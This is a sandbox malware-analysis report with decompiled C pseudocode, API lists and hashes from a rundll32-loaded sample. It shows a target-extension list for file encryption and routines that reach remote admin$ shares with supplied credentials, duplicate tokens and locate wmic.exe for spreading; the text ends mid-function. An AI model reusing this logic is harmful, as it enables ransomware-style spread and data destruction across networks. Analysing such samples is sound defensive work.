                                                                                                                                                  0x047775c0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047775c0
                                                                                                                                                  0x04777578
                                                                                                                                                  0x0477757b
                                                                                                                                                  0x04777589
                                                                                                                                                  0x047775a0
                                                                                                                                                  0x047775b0
                                                                                                                                                  0x047775b2
                                                                                                                                                  0x047775b2
                                                                                                                                                  0x0477758b
                                                                                                                                                  0x04777592
                                                                                                                                                  0x04777592
                                                                                                                                                  0x047775b7
                                                                                                                                                  0x047775ba
                                                                                                                                                  0x047775be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047775be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477755d
                                                                                                                                                  0x0477755d
                                                                                                                                                  0x047775c1
                                                                                                                                                  0x047775c4
                                                                                                                                                  0x047775c9
                                                                                                                                                  0x047775c9
                                                                                                                                                  0x047775cf
                                                                                                                                                  0x047775d5
                                                                                                                                                  0x047775d5

                                                                                                                                                  APIs
                                                                                                                                                  • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,?,?,?,?), ref: 0477754C
                                                                                                                                                  • NetApiBufferFree.NETAPI32(?), ref: 047775C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BufferEnumFreeServer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2429717511-0
                                                                                                                                                  • Opcode ID: 25e1534c2b8b6e50df1f607d604d00bf1cac899a96f7ea9499729c5d2eca042a
                                                                                                                                                  • Instruction ID: a7449e7719737ecbd3df832fbda70d1772aceccf81bb5021e414bb4e1b89c427
                                                                                                                                                  • Opcode Fuzzy Hash: 25e1534c2b8b6e50df1f607d604d00bf1cac899a96f7ea9499729c5d2eca042a
                                                                                                                                                  • Instruction Fuzzy Hash: D1215E76900219EBDF25CF94C844AEEBB79FF04B14F908516F911B6250E370B751DBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E04777DD0(void* __ecx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				signed int _t17;
                                                                                                                                                  				void** _t19;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				signed int _t22;
                                                                                                                                                  				signed int* _t23;
                                                                                                                                                  				signed int* _t24;
                                                                                                                                                  				void* _t26;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				signed int _t31;
                                                                                                                                                  				signed int _t32;
                                                                                                                                                  				signed int* _t35;
                                                                                                                                                  				signed int* _t36;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				signed int _t39;
                                                                                                                                                  				signed int _t41;
                                                                                                                                                  				signed int _t42;
                                                                                                                                                  
                                                                                                                                                  				_t17 = E04776477();
                                                                                                                                                  				_t39 = _t17;
                                                                                                                                                  				_t19 =  &_v8;
                                                                                                                                                  				asm("sbb esi, esi");
                                                                                                                                                  				_t27 = 0;
                                                                                                                                                  				_t2 = _t39 - 0x1e; // -30
                                                                                                                                                  				_t42 = _t41 & _t2;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				__imp__NetServerGetInfo(0, 0x65, _t19, 0x1e, _t38, _t41, _t26, __ecx); // executed
                                                                                                                                                  				_t20 = _v8;
                                                                                                                                                  				if(_t19 == 0 && ( *(_t20 + 0x10) & 0x00000018) != 0) {
                                                                                                                                                  					_t27 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                                  					NetApiBufferFree(_t20);
                                                                                                                                                  				}
                                                                                                                                                  				if(_t27 != 0) {
                                                                                                                                                  					_t39 = _t39 + 0xf;
                                                                                                                                                  				}
                                                                                                                                                  				_t31 = 3;
                                                                                                                                                  				_t22 = _t39 / _t31;
                                                                                                                                                  				_t32 = 0xf;
                                                                                                                                                  				if(_t39 <= 0x1e) {
                                                                                                                                                  					_t12 = _t39 - 0xf; // -30
                                                                                                                                                  					asm("sbb ecx, ecx");
                                                                                                                                                  					_t32 = _t32 & _t12;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t39 > 0xf) {
                                                                                                                                                  					_t39 = 0xf;
                                                                                                                                                  				}
                                                                                                                                                  				_t35 = _a4;
                                                                                                                                                  				if(_t35 != 0) {
                                                                                                                                                  					 *_t35 = _t42;
                                                                                                                                                  				}
                                                                                                                                                  				_t36 = _a12;
                                                                                                                                                  				if(_t36 != 0) {
                                                                                                                                                  					 *_t36 = _t22;
                                                                                                                                                  				}
                                                                                                                                                  				_t23 = _a16;
                                                                                                                                                  				if(_t23 != 0) {
                                                                                                                                                  					 *_t23 = _t32;
                                                                                                                                                  				}
                                                                                                                                                  				_t24 = _a8;
                                                                                                                                                  				if(_t24 != 0) {
                                                                                                                                                  					 *_t24 = _t39;
                                                                                                                                                  				}
                                                                                                                                                  				return _t24;
                                                                                                                                                  			}




















                                                                                                                                                  0x04777dd7
                                                                                                                                                  0x04777dde
                                                                                                                                                  0x04777de3
                                                                                                                                                  0x04777de7
                                                                                                                                                  0x04777de9
                                                                                                                                                  0x04777ded
                                                                                                                                                  0x04777df1
                                                                                                                                                  0x04777df3
                                                                                                                                                  0x04777df6
                                                                                                                                                  0x04777dfe
                                                                                                                                                  0x04777e01
                                                                                                                                                  0x04777e09
                                                                                                                                                  0x04777e09
                                                                                                                                                  0x04777e0c
                                                                                                                                                  0x04777e0f
                                                                                                                                                  0x04777e0f
                                                                                                                                                  0x04777e17
                                                                                                                                                  0x04777e19
                                                                                                                                                  0x04777e19
                                                                                                                                                  0x04777e1e
                                                                                                                                                  0x04777e23
                                                                                                                                                  0x04777e27
                                                                                                                                                  0x04777e2b
                                                                                                                                                  0x04777e2f
                                                                                                                                                  0x04777e32
                                                                                                                                                  0x04777e34
                                                                                                                                                  0x04777e34
                                                                                                                                                  0x04777e39
                                                                                                                                                  0x04777e3d
                                                                                                                                                  0x04777e3d
                                                                                                                                                  0x04777e3e
                                                                                                                                                  0x04777e43
                                                                                                                                                  0x04777e45
                                                                                                                                                  0x04777e45
                                                                                                                                                  0x04777e47
                                                                                                                                                  0x04777e4c
                                                                                                                                                  0x04777e4e
                                                                                                                                                  0x04777e4e
                                                                                                                                                  0x04777e50
                                                                                                                                                  0x04777e55
                                                                                                                                                  0x04777e57
                                                                                                                                                  0x04777e57
                                                                                                                                                  0x04777e59
                                                                                                                                                  0x04777e5e
                                                                                                                                                  0x04777e60
                                                                                                                                                  0x04777e60
                                                                                                                                                  0x04777e66

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 04776477: GetTickCount.KERNEL32 ref: 04776477
                                                                                                                                                  • NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,04777AA3,?,?,000000FF,?,?), ref: 04777DF6
                                                                                                                                                  • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,04777AA3,?,?,000000FF,?,?), ref: 04777E0F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BufferCountFreeInfoServerTick
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2934114180-0
                                                                                                                                                  • Opcode ID: 909727491ed1b23df6762545b03001d161408f83a912798049b9f0a37dab91ae
                                                                                                                                                  • Instruction ID: 2ff7fee7ddddcba591d7454281dd6f50659b8932921ae988c53f2358d6668fc6
                                                                                                                                                  • Opcode Fuzzy Hash: 909727491ed1b23df6762545b03001d161408f83a912798049b9f0a37dab91ae
                                                                                                                                                  • Instruction Fuzzy Hash: 2D11BC727003099FEF28CE79D885B6EB79AEF80B14F584569E505CB240D7B0FD009750
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                  			E047759B1(signed short* __eax) {
                                                                                                                                                  				short _v524;
                                                                                                                                                  				signed short* _t6;
                                                                                                                                                  				intOrPtr _t7;
                                                                                                                                                  				WCHAR* _t9;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				signed int _t13;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  
                                                                                                                                                  				_t6 = __eax;
                                                                                                                                                  				_t11 = 0;
                                                                                                                                                  				_t15 =  &_v524 - __eax;
                                                                                                                                                  				do {
                                                                                                                                                  					_t13 =  *_t6 & 0x0000ffff;
                                                                                                                                                  					 *(_t15 + _t6) = _t13;
                                                                                                                                                  					_t6 =  &(_t6[1]);
                                                                                                                                                  				} while (_t13 != 0);
                                                                                                                                                  				_t18 =  &_v524 - 2;
                                                                                                                                                  				do {
                                                                                                                                                  					_t7 =  *((intOrPtr*)(_t18 + 2));
                                                                                                                                                  					_t18 = _t18 + 2;
                                                                                                                                                  				} while (_t7 != 0);
                                                                                                                                                  				asm("movsd"); // executed
                                                                                                                                                  				_t9 = StrStrIW(L".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.",  &_v524); // executed
                                                                                                                                                  				if(_t9 != 0) {
                                                                                                                                                  					_t11 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}











                                                                                                                                                  0x047759b1
                                                                                                                                                  0x047759c1
                                                                                                                                                  0x047759c3
                                                                                                                                                  0x047759c5
                                                                                                                                                  0x047759c5
                                                                                                                                                  0x047759c8
                                                                                                                                                  0x047759cc
                                                                                                                                                  0x047759cf
                                                                                                                                                  0x047759dc
                                                                                                                                                  0x047759df
                                                                                                                                                  0x047759df
                                                                                                                                                  0x047759e3
                                                                                                                                                  0x047759e6
                                                                                                                                                  0x047759fc
                                                                                                                                                  0x047759fd
                                                                                                                                                  0x04775a07
                                                                                                                                                  0x04775a0b
                                                                                                                                                  0x04775a0b
                                                                                                                                                  0x04775a10

                                                                                                                                                  APIs
                                                                                                                                                  • StrStrIW.SHLWAPI(.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.em,?,00000000,?,00000000), ref: 047759FD
                                                                                                                                                  Strings
                                                                                                                                                  • .3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.em, xrefs: 047759F7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.em
                                                                                                                                                  • API String ID: 0-897358456
                                                                                                                                                  • Opcode ID: 61d2163d4f8d8ea1d2551c8944763d41e8ea6fbdae50dd479b9eb4792418fb86
                                                                                                                                                  • Instruction ID: 8c429cb15b4c57591cd4cd6296b5503c57dd4fde1c9b20acc9afe84ba5f0b406
                                                                                                                                                  • Opcode Fuzzy Hash: 61d2163d4f8d8ea1d2551c8944763d41e8ea6fbdae50dd479b9eb4792418fb86
                                                                                                                                                  • Instruction Fuzzy Hash: C8F02E26A003159BCB306FACDD896E377B8EF85554F8002B5D456A7206F674A946CB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04776DA4(signed int __eax, void* __ecx, struct _CRITICAL_SECTION* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _t35;
                                                                                                                                                  				signed int _t43;
                                                                                                                                                  				intOrPtr* _t48;
                                                                                                                                                  				signed int _t54;
                                                                                                                                                  				struct _CRITICAL_SECTION* _t56;
                                                                                                                                                  
                                                                                                                                                  				_t56 = __esi;
                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                  				_t43 = __eax;
                                                                                                                                                  				if(__esi == 0) {
                                                                                                                                                  					L8:
                                                                                                                                                  					return _v8;
                                                                                                                                                  				}
                                                                                                                                                  				EnterCriticalSection(__esi);
                                                                                                                                                  				_t54 = _t43;
                                                                                                                                                  				if(_t43 >=  *((intOrPtr*)(__esi + 0x24)) + _t43) {
                                                                                                                                                  					L7:
                                                                                                                                                  					LeaveCriticalSection(_t56);
                                                                                                                                                  					goto L8;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L2;
                                                                                                                                                  				}
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L2:
                                                                                                                                                  					_t35 =  *((intOrPtr*)(_t56 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4)))), _a4,  *((intOrPtr*)(_t56 + 0x1c)));
                                                                                                                                                  					_v8 = _t35;
                                                                                                                                                  					if(_t35 != 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t54 = _t54 + 1;
                                                                                                                                                  					if(_t54 <  *(_t56 + 0x24) + _t43) {
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					goto L7;
                                                                                                                                                  				}
                                                                                                                                                  				_t48 = _a8;
                                                                                                                                                  				if(_t48 != 0) {
                                                                                                                                                  					 *_t48 =  *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4));
                                                                                                                                                  				}
                                                                                                                                                  				goto L7;
                                                                                                                                                  			}









                                                                                                                                                  0x04776da4
                                                                                                                                                  0x04776da8
                                                                                                                                                  0x04776dad
                                                                                                                                                  0x04776db1
                                                                                                                                                  0x04776e13
                                                                                                                                                  0x04776e18
                                                                                                                                                  0x04776e18
                                                                                                                                                  0x04776db5
                                                                                                                                                  0x04776dc0
                                                                                                                                                  0x04776dc4
                                                                                                                                                  0x04776e0b
                                                                                                                                                  0x04776e0c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776dc6
                                                                                                                                                  0x04776dc6
                                                                                                                                                  0x04776ddd
                                                                                                                                                  0x04776de0
                                                                                                                                                  0x04776de5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776dea
                                                                                                                                                  0x04776def
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776df1
                                                                                                                                                  0x04776df3
                                                                                                                                                  0x04776df8
                                                                                                                                                  0x04776e09
                                                                                                                                                  0x04776e09
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04776E98,?,00000000,?,?,04776A84,?,?), ref: 04776DB5
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,04776E98,?,00000000,?,?,04776A84,?,?), ref: 04776E0C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                  • Opcode ID: e3cf9ae116dda29d68dfb09db57f31d530c0c1c9df59c9a508c986fb50c973b9
                                                                                                                                                  • Instruction ID: 95a199ce142d4e3f5fb0594628927c44c468ceb27584f61d371676c66e168a32
                                                                                                                                                  • Opcode Fuzzy Hash: e3cf9ae116dda29d68dfb09db57f31d530c0c1c9df59c9a508c986fb50c973b9
                                                                                                                                                  • Instruction Fuzzy Hash: 7D116935700A009FCB25CF6AC880A5AB7E6FF893147958529E886C7315DB71F911CA90
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E04776AA8(WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                  				signed int _t6;
                                                                                                                                                  
                                                                                                                                                  				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t6 = StrCmpIW(_a4, _a8); // executed
                                                                                                                                                  					asm("sbb eax, eax");
                                                                                                                                                  					return  ~_t6 + 1;
                                                                                                                                                  				}
                                                                                                                                                  			}




                                                                                                                                                  0x04776aaf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776ab7
                                                                                                                                                  0x04776abd
                                                                                                                                                  0x04776ac5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776ac7

                                                                                                                                                  APIs
                                                                                                                                                  • StrCmpIW.KERNELBASE(00000000,?), ref: 04776ABD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 66d2c64323d4b5083ea24e6b703e7848351348461161b82abd55277db29d7021
                                                                                                                                                  • Instruction ID: f84aa4bd8183ce1bf5608366fd6e99d9d964c633e066bac0f9e33f81da4065e3
                                                                                                                                                  • Opcode Fuzzy Hash: 66d2c64323d4b5083ea24e6b703e7848351348461161b82abd55277db29d7021
                                                                                                                                                  • Instruction Fuzzy Hash: 1AD0A731154B0DFEDF315E74C808BB83798EB10326F84C420BA0A846A4D375D1B8DE40
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0477C493(signed int _a8, signed int _a12) {
                                                                                                                                                  				void* _t5;
                                                                                                                                                  
                                                                                                                                                  				_t5 = malloc(_a8 * _a12); // executed
                                                                                                                                                  				return _t5;
                                                                                                                                                  			}




                                                                                                                                                  0x0477c49e
                                                                                                                                                  0x0477c4a5

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                  • Opcode ID: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                                                                                                  • Instruction ID: af69fecfd1e2999e4f19adc51611d27c4263d679fdeac80649948d592ea887c2
                                                                                                                                                  • Opcode Fuzzy Hash: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                                                                                                  • Instruction Fuzzy Hash: C1B0123311830D5BAF04EEE8E986C5E77DCEAA4524B804406F91C8F240E931F6104758
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 61%
                                                                                                                                                  			E04779B63(long _a4, short* _a8, short* _a12, signed int _a16) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				int _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				void* _v40;
                                                                                                                                                  				void* _v44;
                                                                                                                                                  				void* _v52;
                                                                                                                                                  				void* _v56;
                                                                                                                                                  				void* _v60;
                                                                                                                                                  				short _v68;
                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                  				void _v112;
                                                                                                                                                  				char _v116;
                                                                                                                                                  				short* _v128;
                                                                                                                                                  				void _v144;
                                                                                                                                                  				struct _NETRESOURCE _v148;
                                                                                                                                                  				short _v668;
                                                                                                                                                  				char _v1188;
                                                                                                                                                  				short _v2748;
                                                                                                                                                  				short _v4796;
                                                                                                                                                  				short _v6844;
                                                                                                                                                  				short _v8892;
                                                                                                                                                  				short _v74428;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				signed int _t112;
                                                                                                                                                  				WCHAR* _t130;
                                                                                                                                                  				void* _t141;
                                                                                                                                                  				int _t144;
                                                                                                                                                  				int _t150;
                                                                                                                                                  				long _t151;
                                                                                                                                                  				signed int _t163;
                                                                                                                                                  				int _t168;
                                                                                                                                                  				signed int _t173;
                                                                                                                                                  				long _t184;
                                                                                                                                                  				WCHAR* _t187;
                                                                                                                                                  				int _t189;
                                                                                                                                                  				signed int _t192;
                                                                                                                                                  				int _t199;
                                                                                                                                                  				void* _t205;
                                                                                                                                                  
                                                                                                                                                  				E0477A760(0x122bc);
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                  					_v8 = 0x57;
                                                                                                                                                  					L51:
                                                                                                                                                  					_t112 = _a16;
                                                                                                                                                  					__eflags = _t112;
                                                                                                                                                  					if(_t112 != 0) {
                                                                                                                                                  						 *_t112 = _v24;
                                                                                                                                                  					}
                                                                                                                                                  					SetLastError(_v8);
                                                                                                                                                  					return _v16;
                                                                                                                                                  				}
                                                                                                                                                  				_v668 = 0;
                                                                                                                                                  				wsprintfW( &_v668, L"\\\\%s\\admin$", _a4);
                                                                                                                                                  				_v148 = 0;
                                                                                                                                                  				_t192 = 7;
                                                                                                                                                  				memset( &_v144, 0, _t192 << 2);
                                                                                                                                                  				_v128 =  &_v668;
                                                                                                                                                  				_t199 = 1;
                                                                                                                                                  				_v144 = 1;
                                                                                                                                                  				E047788D3( &_v1188);
                                                                                                                                                  				_t187 = L"\\\\%ws\\admin$\\%ws";
                                                                                                                                                  				wsprintfW( &_v6844, _t187, _a4,  &_v1188);
                                                                                                                                                  				_v4796 = 0;
                                                                                                                                                  				_v8892 = 0;
                                                                                                                                                  				wsprintfW( &_v4796, _t187, _a4,  &_v1188);
                                                                                                                                                  				_t130 = PathFindExtensionW( &_v4796);
                                                                                                                                                  				if(_t130 != 0) {
                                                                                                                                                  					 *_t130 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				wsprintfW( &_v8892, _t187, _a4, L"cscc.dat");
                                                                                                                                                  				_v28 = _v28 & 0x00000000;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_v24 = WNetAddConnection2W( &_v148, _a12, _a8, 0);
                                                                                                                                                  					if(PathFileExistsW( &_v8892) != 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = GetLastError();
                                                                                                                                                  					_t141 = E047787E7( *0x4787b94,  &_v6844,  *0x4783984);
                                                                                                                                                  					_t189 = 0;
                                                                                                                                                  					if(_t141 != 0) {
                                                                                                                                                  						__eflags = _a8;
                                                                                                                                                  						if(_a8 != 0) {
                                                                                                                                                  							__eflags = _a12;
                                                                                                                                                  							if(_a12 != 0) {
                                                                                                                                                  								E047768B5(_a8, _a12);
                                                                                                                                                  								 *0x4783010 = _t199;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_v20 = _t189;
                                                                                                                                                  						_v12 = _t189;
                                                                                                                                                  						_t144 = OpenThreadToken(GetCurrentThread(), 2, _t199,  &_v20);
                                                                                                                                                  						__eflags = _t144;
                                                                                                                                                  						if(_t144 != 0) {
                                                                                                                                                  							DuplicateTokenEx(_v20, 0x2000000, _t189, 2, _t199,  &_v12);
                                                                                                                                                  						}
                                                                                                                                                  						_v74428 = 0;
                                                                                                                                                  						_v2748 = 0;
                                                                                                                                                  						_v44 = _t189;
                                                                                                                                                  						asm("stosd");
                                                                                                                                                  						asm("stosd");
                                                                                                                                                  						asm("stosd");
                                                                                                                                                  						memset( &_v112, _t189, 0x40);
                                                                                                                                                  						_v68 = 0;
                                                                                                                                                  						_v116 = 0x44;
                                                                                                                                                  						_v72 = 1;
                                                                                                                                                  						_t150 = GetSystemDirectoryW( &_v2748, 0x104);
                                                                                                                                                  						__eflags = _t150;
                                                                                                                                                  						if(_t150 == 0) {
                                                                                                                                                  							_t151 = GetLastError();
                                                                                                                                                  							goto L39;
                                                                                                                                                  						} else {
                                                                                                                                                  							PathAppendW( &_v2748, L"wbem\\wmic.exe");
                                                                                                                                                  							__eflags = PathFileExistsW( &_v2748);
                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                  								L41:
                                                                                                                                                  								DeleteFileW( &_v6844);
                                                                                                                                                  								L43:
                                                                                                                                                  								__eflags = _v12 - _t189;
                                                                                                                                                  								if(_v12 != _t189) {
                                                                                                                                                  									CloseHandle(_v12);
                                                                                                                                                  									_v12 = _t189;
                                                                                                                                                  								}
